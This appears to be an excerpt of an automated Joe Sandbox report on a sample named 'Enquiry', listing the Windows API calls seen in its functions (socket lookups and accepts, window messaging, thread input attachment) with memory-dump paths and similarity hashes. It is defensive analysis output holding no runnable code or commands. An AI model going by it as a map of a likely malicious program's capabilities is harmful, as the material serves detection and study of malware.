                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                            • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                            • _memmove.LIBCMT ref: 0046D475
                            • inet_ntoa.WSOCK32(?), ref: 0046D481
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 2502553879-0
                            • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                            • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                            • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                            • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                            APIs
                            • SendMessageW.USER32 ref: 00448C69
                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow
                            • String ID:
                            • API String ID: 312131281-0
                            • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                            • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                            • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                            • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                            APIs
                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorLastacceptselect
                            • String ID:
                            • API String ID: 385091864-0
                            • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                            • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                            • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                            • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                            • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                            • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                            • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                            APIs
                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                            • GetStockObject.GDI32(00000011), ref: 00430258
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                            • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$CreateMessageObjectSendShowStock
                            • String ID:
                            • API String ID: 1358664141-0
                            • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                            • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                            • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                            • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                            • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                            • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                            • String ID:
                            • API String ID: 2880819207-0
                            • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                            • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                            • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                            • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00430BA2
                            • ScreenToClient.USER32(?,?), ref: 00430BC1
                            • ScreenToClient.USER32(?,?), ref: 00430BE2
                            • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ClientRectScreen$InvalidateWindow
                            • String ID:
                            • API String ID: 357397906-0
                            • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                            • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                            • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                            • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                            APIs
                            • __wsplitpath.LIBCMT ref: 0043392E
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • __wsplitpath.LIBCMT ref: 00433950
                            • __wcsicoll.LIBCMT ref: 00433974
                            • __wcsicoll.LIBCMT ref: 0043398A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                            • String ID:
                            • API String ID: 1187119602-0
                            • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                            • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                            • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                            • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                            • String ID:
                            • API String ID: 1597257046-0
                            • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                            • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                            • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                            • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                            APIs
                            • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                            • __malloc_crt.LIBCMT ref: 0041F5B6
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: EnvironmentStrings$Free__malloc_crt
                            • String ID:
                            • API String ID: 237123855-0
                            • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                            • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                            • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                            • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: DeleteDestroyObject$IconWindow
                            • String ID:
                            • API String ID: 3349847261-0
                            • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                            • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                            • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                            • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                            • String ID:
                            • API String ID: 2223660684-0
                            • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                            • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                            • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                            • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                            APIs
                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                            • LineTo.GDI32(?,?,?), ref: 00447326
                            • EndPath.GDI32(?), ref: 00447336
                            • StrokePath.GDI32(?), ref: 00447344
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                            • String ID:
                            • API String ID: 2783949968-0
                            • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                            • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                            • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                            • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                            APIs
                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                            • GetCurrentThreadId.KERNEL32 ref: 004364A3
                            • AttachThreadInput.USER32(00000000), ref: 004364AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                            • String ID:
                            • API String ID: 2710830443-0
                            • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                            • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                            • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                            • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                              • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                              • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                            • String ID:
                            • API String ID: 146765662-0
                            • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                            • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                            • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                            • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                            APIs
                            • GetDesktopWindow.USER32 ref: 00472B63
                            • GetDC.USER32(00000000), ref: 00472B6C
                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                            • ReleaseDC.USER32(00000000,?), ref: 00472B99
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                            • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                            • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                            • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
